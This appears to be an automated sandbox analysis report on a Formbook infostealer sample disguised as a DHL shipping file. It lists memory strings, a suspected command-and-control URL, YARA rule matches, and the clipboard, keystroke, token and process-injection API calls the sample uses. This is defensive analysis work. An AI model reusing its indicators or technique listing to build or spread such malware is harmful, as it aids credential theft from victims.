            Source: MPhqOtiHUlL.exe, 00000006.00000002.4526783594.0000000004F20000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.empowermedeco.com
            Source: MPhqOtiHUlL.exe, 00000006.00000002.4526783594.0000000004F20000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=0
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2406687140.0000000007F37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4525505296.000000000501A000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003F9A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4527522560.0000000006510000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4525505296.00000000046AE000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe Code function: 0_2_0089EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0089EAFF
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe Code function: 0_2_0089ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0089ED6A
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe Code function: 0_2_0089EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0089EAFF
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe Code function: 0_2_0088AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0088AA57
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe Code function: 0_2_008B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_008B9576

            E-Banking Fraud

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: DHL 0737-12182024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b96be659-0
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b5181c95-c
            Source: DHL 0737-12182024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce8dbb58-0
            Source: DHL 0737-12182024.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7892a7ef-c
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042B363 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D70 NtOpenThread
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0088D5EB CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00881201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0088E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00892046
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00828060
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00888298
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0085E4FF
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0085676B
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008B4873
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0084CAA0
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0082CAF0
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0083CC39
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00856DD9
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008291C0
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0083B119
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00841394
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00841706
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0084781B
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008419B0
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00827920
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0083997D
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00847A4A
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00847CA7
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00841C77
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00859EEE
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008ABE44
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00841F32
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00B65290
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F1D5A
